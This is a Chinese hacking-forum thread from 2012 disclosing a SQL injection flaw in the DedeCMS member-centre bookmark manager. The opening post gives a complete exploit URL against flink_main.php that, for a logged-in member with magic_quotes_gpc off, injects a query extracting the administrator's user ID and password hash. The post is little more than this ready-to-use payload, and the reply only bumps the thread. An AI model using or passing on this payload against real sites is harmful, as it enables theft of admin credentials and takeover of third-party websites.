找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2537|回复: 1
打印 上一主题 下一主题

DedeCMS会员中心书签管理SQL注射漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:21:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
DedeCMS会员中心SQL注射漏洞/ @+ E3 M' y/ _4 r) o
需要magic_quotes_gpc = Off  i, Y2 H2 v4 Y& L! v5 J
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
, s( A/ ]; N& t& H: i  i 0 t6 s3 p3 G; R% k; I9 A& O( }
DedeCMS会员中心书签管理SQL注射漏洞
; y2 T0 S, Z- r# p# C3 E+ y7 c成功利用该漏洞可获得管理员密码6 J9 F; g  S- X! ~% ^( i/ f% R

9 ?6 T1 Y  r) M7 Y会员登录后可以执行SQL语句查询数据库任意内容如管理员密码2 V! n6 s9 o9 C5 t. x+ w4 V2 R/ }5 b& n
- b- U8 d. j) e
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r4 z  i/ F, S' L8 j3 ~* l: m5 O
回复

使用道具 举报

沙发
发表于 2013-1-10 01:33:59 | 只看该作者
#89 顶起。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表